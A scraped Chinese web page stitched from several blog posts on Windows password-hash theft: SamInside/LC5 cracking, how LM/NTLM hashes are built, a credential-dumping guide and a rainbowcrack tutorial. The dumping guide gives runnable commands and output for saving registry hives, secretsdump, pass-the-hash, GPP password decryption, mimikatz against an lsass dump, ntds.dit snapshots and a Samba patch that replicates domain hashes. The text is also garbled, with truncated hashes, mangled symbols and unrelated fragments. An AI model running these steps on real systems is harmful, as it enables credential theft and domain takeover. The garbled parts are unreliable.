yttitan 的BLOG
用户名：yttitan
文章数：312
评论数：919
访问量：508180
注册日期：
阅读量：5863
阅读量：12276
阅读量：388134
阅读量：1079268
51CTO推荐博文
如果希望破解远程系统的用户密码，那么就需要首先从远程系统的SAM文件中读取出密码Hash值，然后在本地通过LC5之类的软件进行破解。获取系统密码Hash值的软件很多，比如GetHashes和SamInside。GetHashes在命令行下操作，用法非常简单，命令格式为“GetHashes.exe&$Local”，但它只能获取WinXP/2003以下系统的用户密码Hash值，对Win7/2008系统就无能为力。SamInside的功能要强大一些，它是一款图形界面工具，可以获取包括Windows&2008&Server以下操作系统的用户密码Hash值。这里主要介绍SamInside的使用。首先在远程计算机上运行软件，然后执行工具栏上的“Import&Local&Users&via&Scheduler”，该软件也带有密码破解功能，在导入账户信息的同时也可以将一些简单的密码破解，但是其破解功能相比LC5还是有不少差距。接着执行工具栏上的“Export&Users&to&PWDUMP&File”，将账户信息导出并保存成文本文件。回到本地计算机，运行LC5，新建一个会话，选择从PWDUMP文件导入账户信息。然后就可以按之前的方法对用户密码进行破解。需要注意的是，由于Win7/2008系统默认不存储密码的LM哈希值，因而在破解时要勾选“破解NTLM认证口令”，破解速度也相对要慢许多。本文出自 “” 博客，转载请与作者联系！
了这篇文章
类别：┆阅读(0)┆评论(0)
本文收录至博客专题：《》《》
22:02:36 09:06:56 16:58:17 18:14:21Google Chrome 17.0.963.56
Windows 7这些网站不错对于渗透的技术相当好
Internet Explorer 8.0
Windows 7 x64 Edition收集了，好多都改版了，毕竟时间这么长了
Google Chrome 50.0.2661.89
Android 6.0.1试一下手机版谷歌浏览器的UA
电子邮件 *
博文浏览排名
- 245,016 views - 224,455 views - 110,198 views - 106,756 views - 91,050 views - 66,683 views - 62,630 views - 60,994 views - 60,666 views - 57,492 views
2017年二月
6789101112
13141516171819
202122232425263630人阅读
windows系统（1）
Hash，一般翻译为“散列”，也有直接音译为“哈希”的，就是把任意长度的输入（又叫做预映射，pre-image），通过散列算法，变换成固定长度的输出，该输出就是散列值。这种转换是一种压缩映射，也就是散列值的空间通常远小于输入的空间，不同的输入可能会散列成相同的输出，而不可能从散列值来唯一的确定输入值。简单的说就是一种将任意长度的消息压缩到某一固定长度的消息摘要的函数。
&& & & MD5&和&SHA1&可以说是目前应用最广泛的Hash算法，而它们都是以&MD4&为基础设计的。那么他们都是什么意思呢?这里简单说一下：
&&&&（1）MD4
&&& MD4(RFC 1320)是&MIT&的&Ronald L. Rivest&在&1990&年设计的，MD是&Message Digest的缩写。它适用在32位字长的处理器上用高速软件实现，它是基于&32&位操作数的位操作来实现的。
&&& （2） MD5
&&& MD5(RFC 1321)是&Rivest于1991年对MD4的改进版本。它仍以512位分组来输入，其输出是4个32位字的级联，与&MD4&相同。MD5比MD4来得复杂，并且速度较之要慢一点，但更安全，在抗分析和抗差分方面表现更好
&&& （3）SHA1 及其他
&&& SHA1是由NIST NSA设计为同DSA一起使用的，它对长度小于264的输入，产生长度为160bit的散列值，因此抗穷举(brute-force)性更好。SHA-1&设计时基于和MD4相同原理，并且模仿了该算法。
Windows系统下的hash密码格式
&& & & Windows系统下的hash密码格式为：用户名称:RID:LM-HASH值:NT-HASH值，例如：Administrator:500:C0EAAAD3B435B51404EE:D4774CE6CC:::表示
&&用户名称为：Administrator
&& &RID为：500
&&& LM-HASH值为：C0EAAAD3B435B51404EE
&&& NT-HASH值为：D4774CE6CC
&&& (1)Windows下LM Hash值生成原理
&&&&假设明文口令是“Welcome”，首先全部转换成大写“WELCOME”，再做将口令字符串大写转后后的字符串变换成二进制串：&“WELCOME” -& D0000
&& & &&技巧：可以将明文口令复制到UltraEdit编辑器中使用二进制方式查看即可获取口令的二进制串。
&& & &&说明：如果明文口令经过大写变换后的二进制字符串不足14字节，则需要在其后添加0x00补足14字节。然后切割成两组7字节的数据，分别经str_to_key（）函数处理得到两组8字节数据：
&&& D45 -str_to_key()-& 56AA
&&& 00 -str_to_key()-& 0000
&&&&这两组8字节数据将做为DESKEY对魔术字符串“KGS!@#$%”进行标准DES加密
&&& &KGS!@#$%& -& 4B25
&&& 56AA -对4B25进行标准DES加密-& CE7665F
&&& 0000 -对4B25进行标准DES加密-& AAD3B435B51404EE
&& & &将加密后的这两组数据简单拼接，就得到了最后的LM Hash
&&& LM Hash: CE7665FAAD3B435B51404EE
&&&&(2) Windows下NTLM Hash生成原理
&& & &&从IBM设计的LM Hash算法存在几个弱点，微软在保持向后兼容性的同时提出了自己的挑战响应机制，NTLM Hash应运而生。假设明文口令是“123456”，首先转换成Unicode字符串，与LM
Hash算法不同，这次不需要添加0x00补足14字节
&& & &&123456& -&
&& & & &从ASCII串转换成Unicode串时，使用little-endian序，微软在设计整个SMB协议时就没考虑过big-endian序，ntoh*()、hton*()函数不宜用在SMB报文解码中。0x80之前的标准ASCII码转换成Unicode码，就是简单地从0x??变成0x00??。此类标准ASCII串按little-endian序转换成Unicode串，就是简单地在原有每个字节之后添加0x00。对所获取的Unicode串进行标准MD4单向哈希，无论数据源有多少字节，MD4固定产生128-bit的哈希值，
&& & & &16字节 -进行标准MD4单向哈希-& 32ED87BDB5FDC5E9CBAD4
&& & & &就得到了最后的NTLM Hash
&& & & &NTLM Hash: 32ED87BDB5FDC5E9CBAD4
&& & & &与LM Hash算法相比，明文口令大小写敏感，无法根据NTLM Hash判断原始明文口令是否小于8字节，摆脱了魔术字符串&KGS!@#$%&。MD4是真正的单向哈希函数，穷举作为数据源出现的明文，难度较大。
获取Windows LM/NTLM HASH值的工具：
& & & & & &1.SAMInside：它能从SAM注册文件中提取用户名以及密码(SAM
是Windows系统中存放系统用户及密码的一种文件，用Syskey（系统密钥）加密保护。)
&3.ophcrack(附带pwdump)
&4.GetHashes(适用于xp)
总结一下：
&& & &两种加密算法分别是LanManager(LM)和NTLM，LM只能存储小于等于14个字符的密码hash，如果密码大于14个，windows就自动使用NTLM对其进行加密了，(这个在LC5里有两种破解方式，所以破解不出来的时候可以换种思路，基本是NTLM的)一般情况下使用PwDump或其他一些hash导出工具(如Cain)导出的hash都有对应的LM和NTLM值，也就是说这个密码位数&=14，这时LM也会有值，但如果大于14位那么就只有对应的NTLM
hash可用了，在LM-Password中会以全0显示，在老版本中以AA3D开头显示的也表示密码位数超过14位，对我们来说没用，不能靠他来查LM彩虹表。&(最近遇到新的情况LM：aad3b435b51404eeaad3b435b51404ee不一定是空密码或者大于14位密码，也可以是人为的设置，这时只能用NTLM了)
&& & &操作系统：对于XP、win2k和win2k3来说，系统默认使用LM进行加密（也可人为设置成NTLM），之后的win2008、win7和Vista禁用了LM，默认使用NTLM，所以不要拿着LM生成的rainbow
table去找NTLM的hash值，但是反过来却可以，因为使用LM方式的加密往往会存在一个对应的NTLM hash(如果密码位数&=14的话，系统同时对这个密码使用NTLM加密并存储了NTLM的hash)，这时候使用ophcrack的NTLM表查找的就是这个NTLM的hash了，而不是LM的hash。&
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：107730次
积分：1473
积分：1473
排名：千里之外
原创：25篇
转载：117篇
(2)(6)(1)(2)(10)(10)(11)(5)(12)(7)(18)(8)(17)(3)(3)(8)(2)(9)(4)(4)原文地址：/community//dumping-windows-credentials/
参考资料：.au/
一）从Windows主机上获取口令：
获得一份SYSTEM, SECURITY 和 SAM信息，download到本地机器
C:\& reg.exe save hklm\sam c:\temp\sam.save
C:\& reg.exe save hklm\security c:\temp\security.save
C:\& reg.exe save hklm\system c:\temp\system.save
2）密码hash
通过一条secretsdump( )命令获得本地账户的密码hash，缓存的域口令以及LSA密码
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright
Core Security Technologies
Target system bootKey: 0x602e8cbf9cfad9e0bbbace
Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead283c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaab54e73b949b:::
Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ecdfbf10321::SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24::SECURUS:::
Dumping LSA Secrets
$MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fbac1b9ade0acbdab432f
3）本地SAM Hashes
使用Ophcrack破解LM hash(ophcrack
使用JtR或hashcat破解NT hash(Jtr == &&
hashcat ==&&
即使不能破解hash，也可能通过传递其他账户的hash方法攻击其他主机甚至域。(传递hash攻击： )
4）缓存的域口令
存在一些域用户之前登录的密码hash口令
使用JtR或hashcat破解。注意声明格式，要么是mscash(xp,w2k3),要么是mscash2(vista,w2k8,w2k8...)。注意不能使用这种hash进行传递hash攻击
5）LSA秘密
在这里，将会发现账户密码被设置给低级别的服务(不同于Local System， Network Service 以及， Local Service)，自动登录等
如果Windows主机是域中的一员，将会发现域主机的口令，通过这个口令，可以通过域认证，从而可以列举域用户，管理员以及浏览共享文件夹等
在Windows上使用wce或Kali中的pth来利用这些口令
$ pth-net rpc user -U &securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fbac1b9ade0acbdab432f& -S dc1.
Administrator
通过域控制器来查找Group Policy Preferences (GPP)密码，并破解：
C:\& wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fbac1b9ade0acbdab432f
C:\& findstr /S cpassword \\dc1.\sysvol\*.xml
\\192.168.122.55\sysvol\\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: =&& description=&& cpassword=&1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs& changeLogon=&0& noChange=&0& neverExpires=&0& acctDisabled=&1& subAuthority=&RID_ADMIN& userName=&Administrator (built-in)&/&
C:\& ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
6）内存中口令
使用mimikatz从内存获取纯文本密码以及通过任务管理器获得LSASS进程
(mimikatz == &&
通过使用Windows自带的任务管理器右击lsass.exe，然后选自“Create Dump FIle”把lsass.exe进程到dump到一个本地文件，或者Procdump（vista之前的版本），也可以使用powershell（ ）
C:\& procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2&&1
然后使用mimikatz和它的minidump模块dump口令
C:\& mimikatz.exe log &sekurlsa::minidump lsass.dmp& sekurlsa::logonPasswords exit
确保mimikatz的主版本和dump文件的版本以及架构一致(参考： )
相应的，也可以上传wce到主机上，但是二进制文件可能被杀毒软件过滤(参考： )
7）Credential Manager
当一个user认证一个共享网络服务，一个代理或使用客户端软件的时候点击了Remember my password”，密码一般会存储成一个使用Windows Data Protection API加密后的vault，可以从Credential Manager中看到每一个被加密的vault，然后可以通过Network Password Recoverydump他们。注意架构，否则失败。(Network Password Recovery ==&&
8)受保护的存储
通过Protected Storage PassView获得IE, Outlook和MSN 中的密码
9）第三方软件
NirSoft 提供很多恢复第三方软件口令的工具( )
二）从域控制器中获得域用户口令
这些技术用于你能访问域控制器是获取域用户口令
1）Volume Shadow Copy
这种技术由从域控制器等Directory服务中获取Active Directory数据库(也就是ntds.dit文件)组成。要求攻击者交互式地通过远程桌面或&psexec&登录到域控制器--背后的理论是使用Volume Shadow Copy功能获得一份ntds.dit，这个文件有时可能被锁住或没有读权限。
首先注意Volume Shadow Copy 服务的状态。如果Volume Shadow Copy没有启动(默认启动的)，通过ntdsutil或vssadmin来启动服务。记住当工作完成后要把状态恢复。
然后从DSA Database file参数中确认ntds.dit文件位置
C:\& reg.exe query hklm\system\currentcontrolset\services\ntds\parameters
然后，检查ntds.dit文件大小，确保至少有两倍的空闲空间。之后使用ntdsutil( )工具来做一个active directory database快照。
C:\& ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to &NTDS&.
snapshot: list all
No snapshots found.
// If there is a recent snapshot (ie. backups scheduled with Windows Server Backup), then consider using that instead of creating a new one.)
snapshot: create
Creating snapshot...
Snapshot set {efc02-48b6-bc24-24df118eb7a2} generated successfully.
snapshot: list all
1: :18:33 {efc02-48b6-bc24-24df118eb7a2}
2: C: {5b8a2cd1-3f1a-4e32-9d2e1}
snapshot: mount 2
Snapshot {5b8a2cd1-3f1a-4e32-9d2e1} mounted as C:\$SNAP__VOLUMEC$\
接下来从C:\$SNAP__VOLUMEC$\Windows\NTDS\下载一份ntds.dit文件，同时获得一份SYSTEM注册表(reg.exe save HKLM\SYSTEM c:\system.save)。
然后删除信息
snapshot: list all
1: :18:33 {efc02-48b6-bc24-24df118eb7a2}
2: C: {5b8a2cd1-3f1a-4e32-9d2e1} C:\$SNAP__VOLUMEC$\
snapshot: unmount 2
Snapshot {5b8a2cd1-3f1a-4e32-9d2e1} unmounted.
snapshot: list all
1: :18:33 {efc02-48b6-bc24-24df118eb7a2}
2: C: {5b8a2cd1-3f1a-4e32-9d2e1}
snapshot: delete 1
Snapshot {5b8a2cd1-3f1a-4e32-9d2e1} deleted.
snapshot: ^C
恢复VSS服务到原来的状态。也可以使用vssadmin(//psexec_command-not-your-daddys-psexec/)，但是vssadmin不能提供“一致的”快照，但是ntdsutil可以提供恰当的ntds数据库的备份。但是在Windows2003上，ntdsutil不能创建快照，所以只能使用vssadmin。
如果ntds.dit文件出现损坏，使用esentutl( )修复：
sentutl /p /o ntds.dit
现在使用secretsdump( )来dump hash文件
$ secretsdump.py -system system.save -ntds ntds.dit LOCAL
Impacket v0.9.11-dev - Copyright
Core Security Technologies
Target system bootKey: 0x24fcdbec01b8b0b61cf6a332
Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Searching for pekList, be patient
Pek found and decrypted: 0xca47b3a8b3477cec0a774bed669c3d9f
Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a881324bad161293dedc:::
也可以使用-history选项来dump历史密码
2）AD Replication (EXPERIMENTAL)
这种技术相比于Volume Shadow Copy侵略性更弱一些，因为它不需要创建AD数据库的快照，启动VSS服务，甚至交换性登录DC服务器。同时如果服务器被剥离了管理员的Se*特权，完全禁止了VSS服务，禁止创建新服务时，它也是最好的选择。
这个技术有本地复制AD数据库组成。AD复制通常发生在一个新的域控制器加入到域中的时候，无路如何，加入一个新的域服务器比在AD数据库中创建一个新的object，然后甚至在删除后还会留下记号这种入侵性要小一些。所以我们需要一个工具来进行复制步骤
由于Samba实现了添加一个DC到域中的所有步骤，所以我们可以修改Samba来实现。我们做的变更只是禁止所有往AD传送数据的步骤而只留下复制的步骤。
使用如下的patch
--- ./src/samba-4.1.0/python/samba/join.py
04:08:05. +1100
+++ /usr/lib/python2.7/site-packages/samba/join.py
04:29:22. +1100
@@ -53,11 @@
ctx.nc_list = [ ctx.config_dn, ctx.schema_dn ]
ctx.full_nc_list = [ctx.base_dn, ctx.config_dn, ctx.schema_dn ]
+ ctx.ntds_guid = misc.GUID(ctx.samdb.schema_format_value(“objectGUID”, ‘\x84\xb9\xe6\xb1t[\xb3A\x9e\xcbkwvd2u&)) # any GUID will do
+ ctx.join_provision()
+ ctx.join_replicate()
if not ctx.subdomain:
然后准备复制
# rm -fr /var/lib/ mkdir /var/lib/ rm -f /etc/samba/smb.conf
# echo nameserver 192.168.122.55 & /etc/resolv.conf # this is the IP address of the DC
# samba-tool domain join
DC -U securus\\administrator%Bonjour1 --realm=
Finding a writeable DC for domain &&
Found DC dc1.
workgroup is SECURUS
Calling bare provision
More than one IPv4 address found. Using 192.168.122.25
No IPv6 address will be assigned
Provision OK for domain DN DC=securus,DC=corp,DC=com
Starting replication
Did not manage to negotiate mandetory feature SIGN for dcerpc auth_level 6
Schema-DN[CN=Schema,CN=Configuration,DC=securus,DC=corp,DC=com] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=securus,DC=corp,DC=com] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=securus,DC=corp,DC=com] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=securus,DC=corp,DC=com] objects[1553] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=securus,DC=corp,DC=com] objects[402] linked_values[0]
Partition[CN=Configuration,DC=securus,DC=corp,DC=com] objects[804] linked_values[0]
Partition[CN=Configuration,DC=securus,DC=corp,DC=com] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=securus,DC=corp,DC=com] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=securus,DC=corp,DC=com] objects[1622] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=securus,DC=corp,DC=com] objects[100] linked_values[24]
Partition[DC=securus,DC=corp,DC=com] objects[347] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
Joined domain SECURUS (SID S-1-5-21-7365192) as a DC
然后使用pdbedit 来dumpNThash
# pdbedit -L -w
Administrator::XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:1CC7B897A8CCF50ADE8F7:[U ]:LCT-529540CA:
hdes::XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:EEB900E9337FFD:[UX ]:LCT-528D7BA5:
Samba不提供dump历史密码或LM hash的功能，但是可以用samba-pwdump.py( )脚本直接从LBD中提取出来
# ./samba-pwdump.py &/var/lib/samba/private/sam.ldb.d/DC=SECURUS,DC=CORP,DC=COM.ldb& -history
Administrator:500:43d119e8b3db23734e0dac:a881324bad161293dedc:::
jdoe:2c3e4ca852f61:077cccc23f8abb70c694a49:::
jdoe_history0:a8a1e7665fccfdb453:316c5ae8a7b5dfce4ae976e:::
为了区分不同，比较了LDIF导出的Root DSE 和AD的DNs
#!/bin/bash
# dump Root DSE
ldapsearch -h 192.168.122.55 -x -D &SECURUS\Administrator& -w Bonjour1 -b && -s base &objectclass=*&
# dump base DNs
contexts=(&DC=securus,DC=corp,DC=com& &CN=Configuration,DC=securus,DC=corp,DC=com& &CN=Schema,CN=Configuration,DC=securus,DC=corp,DC=com& &DC=DomainDnsZones,DC=securus,DC=corp,DC=com& &DC=ForestDnsZones,DC=securus,DC=corp,DC=com&)
for ctx in &${contexts[@]}&; do
ldapsearch -h 192.168.122.55 -x -D &SECURUS\Administrator& -w Bonjour1 -b &$ctx& -s sub &objectclass=*&
唯一的不同就是域管理员的logonCount和lastLogon属性增加了。所以Root DSE的highestCommitedUSN属性也增加了。副本会在Windows的security log产生“Directory Service Access”记录，这是由于特权访问AD导致的。如果其他的分类也启动了，那么也会记录其他的log。副本不改变注册表项。
相关 [windows 口令] 推荐：
- 互联网 - ITeye博客
原文地址：/community//dumping-windows-credentials/. 参考资料：.au/. 一）从Windows主机上获取口令：.
- Darth Noctis -
Windows Vista内核版本号为Windows 6.0，Windows 7为Windows 6.1，微软近日也证实，Windows 8就是Windows 6.2，尽管这个消息已经是尽人皆知了. 想必微软在Vista身上受到了惨痛的教训，以至于今后很长一段时间都无法痊愈. 如果Windows 8下一代的内核版本号采用Windows 6.3，你也不必太过惊讶.
- 互联网 - ITeye博客
参考： /servlet/JiveServlet/downloadBody/-6389/Mitigating%20Service%20Account%20Credential%20Theft%20on%20Windows.pdf.
现在Windows Phone的销售是一个茶几啊. 微软已经承认，Windows Phone的表现低于预期. 而在4-6月这个季度的数据显示，Windows Phone的销量只有140万台，市场占有率只有1.3%，已经达到了历史上的新低. 而comScore的最新数据也表示，他在美国和欧洲5国的总市场占有率也由2.8%下降到2.2%.
- We_Get - CNode社区
Cygwin网站：/，Cygwin是什么就不多说了，反正是必须的. 先下载setup文件，就算安装完了这个文件也别删，以后万一还有用得着的地方. 如果首次安装有些包忘记装了，还得用这个再次安装. 我一开始就忘记了好几个包，导致浪费了好多时间. 主要是记得第一个界面时选择“install from internet”，否则就会失败.
- Kindy - 《程序员》杂志官网
就在我开始撰稿之时，英国女王正在二战盟军密码破译中心所在地向英国儿童宣布一项密码破解挑战赛. 这是自美国总统奥巴马在电视讲话中提醒公众注意密码安全后，第二位西方国家元首就很细节的安全技巧直接与民众进行对话，给充满口令和密码迷局的本月带来了有趣的风景. 微软决定强化Hotmail的口令安全管理，逐步禁止用户采用常见密码.
- skyan - Solidot
微软遵守承诺发布了Kinect SDK For Windows，允许教育研究人员或爱好者为这种体感控制器开发新的应用. SDK是基于XBOX 360上使用的软件，但微软将其移植到了.NET平台，支持C#、VB.NET或C++.NET等开发语言. Kinect SDK For Windows的运行平台是Windows 7，最低硬件需求是4GB RAM、双核处理器和DirectX 9.0c显卡，开发工具是Visual Studio 2010 Express（免费版），.NET Framework 4.0.
- 杯子 - 增强视觉 | 计算机视觉 增强现实
官方首页：/en-us/um/redmond/projects/kinectsdk/default.aspx. 微软从PrimeSense买来Kinect硬件加上来自Andrew Blake 带领的MSR剑桥视觉组的算法，让微软在本已经热卖的XBox360上又大赚了一大笔.
- Sheriff - Solidot
一位勇敢的操作系统研究者发布了一则YouTube视频(YouTube，Youku)，展现了从Windows 1.0一路升级到Windows7的经过. 作者是在一个VMWar虚拟机上安装微软的操作系统，视频展示了DOS和Windows的安装，通过安装一些DOS游戏来观察较新的操作系统是如何处理向后兼容性的，以及Windows中偏好设置是如何在升级中保留下来的.
- Shang Wenbin - 酷壳 -
源文：A Brief History of Windows Programming Revolutions （Ron Burk）. 首先，是 Windows API 和 DLL Hell. 在那个时候，Microsoft 创建了 VERSIONINFO 资源来管理版本信息，当然，是用来消除DLL Hell.
坚持分享优质有趣的原创文章，并保留作者信息和版权声明，任何问题请联系：@。您的位置: >
彩虹表如何破解hash密码
来源:黑客x档案
摘要:彩虹表是一个非常庞大的、针对各种可能的字母、数字等字符组合预先计算好的hash的集合，用来破解各种hash加密的密码。网上有很多彩虹表可供我们下载，当然也可以自己生成，rainbowcrack就是这样的工具。 RainbowCrack是利用内存时间交换技术加速口令破解过程
彩虹表是一个非常庞大的、针对各种可能的字母、数字等字符组合预先计算好的hash的集合，用来破解各种hash加密的密码。网上有很多彩虹表可供我们下载，当然也可以自己生成，rainbowcrack就是这样的工具。
RainbowCrack是利用内存时间交换技术加速口令破解过程，官方地址/#download下载。RainbowCrack使用了彩虹表，通过预先花费时间创建这样的彩虹表，能够在以后破解口令时节约大量的时间。RainbowCrack包括下面三个程序
rtgen.exe&&彩虹表生成工具，生成口令、散列值对照表。
rtsort.exe&&排序彩虹表，为rcrack.exe提供输入。
rcrack.exe&&使用排好序的彩虹表进行口令破解。
首先使用彩虹表生成器（rtgen.exe）生成自己的彩虹表。其命令行格式为：
rtgen hash_algorithm \
plain_charset plain_len_min plain_len_max \
rainbow_table_index \
rainbow_chain_length rainbow_chain_count \
file_title_suffix
rtgen hash_algorithm \
plain_charset plain_len_min plain_len_max \
rainbow_table_index \
Hash_algorithm包括lm, md5, sha1,mysqlsha1等，指定密码的加密算法，其中lm是windows密码的加密算法。
plain_charset指定密码的字符集一般有大写字母、小写字母、数字和特殊字符。详细参数信息如下：
numeric = []
alpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
alpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
loweralpha = [abcdefghijklmnopqrstuvwxyz]
loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz]
mixalpha = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-numeric = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
ascii-32-95 = [ !&#$%&'()*+,-./:;&=&?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~]
ascii-32-65-123-4 = [ !&#$%&'()*+,-./:;&=&?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`{|}~]
alpha-numeric-symbol32-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_+=~`[]{}|\:;&&&&,.?/ ]
oracle-alpha-numeric-symbol3 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ#$_]
plain_len_min 指定密码的最小长度。
plain_len_max指定密码的最大长度。
rainbow_table_index指定彩虹表的索引。
rainbow_chain_length指定彩虹链的长度。
rainbow_chain_count指定要生成彩虹链的个数。
file_title_suffix指定生成的彩虹表文件名的注释。
-bench 用户性能测试。
下面是使用彩虹表生成器的几个命令行示例：
rtgen lm alpha 1 7 0 100 16 test
rtgen md5 byte 4 4 0 100 16 test
rtgen sha1 numeric 1 10 0 100 16 test
rtgen lm alpha 1 7 0 -bench
建议使用默认值来创建自己的彩虹表。如下面的例子创建一个128M的大写字母md5加密的彩虹表，密码最短1位，最长7位。
C:yeetrac&rtgen md5 alpha 1 7 0
hash routine: lm
hash length: 8
plain charset: ABCDEFGHIJKLMNOPQRSTUVWXYZ
plain charset in hex: 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a
plain length range: 1 & 7
plain charset name: alpha
plain space total:
rainbow table index: 0
reduce offset: 0
generating&
创建比较大的彩虹表可能要花费很久的时间，几小时甚至几天，跟硬件有关。在生成了彩虹表之后，我们会在当前目录下找到一个名称为lm_alpha#1-7_0__yeetrack.rt的文件，其中yeetrack是我们在命令中输入的文件名注释。
接下来的工作是使用彩虹表排序程序（rtsort.exe）进行排序，目的是加快彩虹表的查找速度。这个命令的语法很简单，格式为：
rtsort rainbow_table_pathname
其中rainbow_table_pathname是要排序彩虹表的文件名。例如，排序前面创建的彩虹表，可以使用下面的命令：
C:\yeetrack&rtsort lm_alpha#1-7_0__all.rt
这个命令需要执行几分钟的时间。
最后，使用彩虹表破解程序（rcrack.exe）破解散列值。破解md5命令很简单，如下面的破解结果：
C:\yeetrack\rainbowcrack-1.5-win64&rcrack.exe md5_alpha#1
0x.rt -h 8A9AF77B68F754029EEDB
bytes memory available
bytes memory allocated for table buffer
33600 bytes memory allocated for chain traverse
disk: md5_alpha#1-7_0__0.rt:
bytes read
searching for 1 hash&
disk: finished reading all files
plaintext of 8a9af77b68f754029eedb is ZCXVB
statistics
&&&&&&&&&&&&&&&&&&-
plaintext found: 1 of 1
total time: 0.42 s
time of chain traverse: 0.26 s
time of alarm check: 0.14 s
time of wait: 0.00 s
time of other operation: 0.02 s
time of disk read: 0.08 s
hash & reduce calculation of chain traverse: 2202900
hash & reduce calculation of alarm check: 1449527
number of alarm: 2066
speed of chain traverse: 8.28 million/s
speed of alarm check: 10.21 million/s
&&&&&&&&&&&&&&&&&&-
8a9af77b68f754029eedb ZCXVB hex:5a
成功破解出明文密码。彩虹表越大破解的概率就越高，如今比较流行的彩虹表大小为120G。如果想破解windows密码，就需要生成lm彩虹表，命令：rtgen lm alpha 1 7 0
yeetrack，其他步骤一样，不过windows的密码hash一般保存在c:/windows/system32/config/sam中，需要从中获取hash，工具有pwdump，lc4，lc5等。
(责任编辑：网络)
本文章原创来自： 黑客流安全网 （转载请保留黑客网站版权。侵权必究）
订阅更新: 您可以通过
Powered by
黑客流安全网
Inc.Copyright & 2007-. 黑客网站 版权所有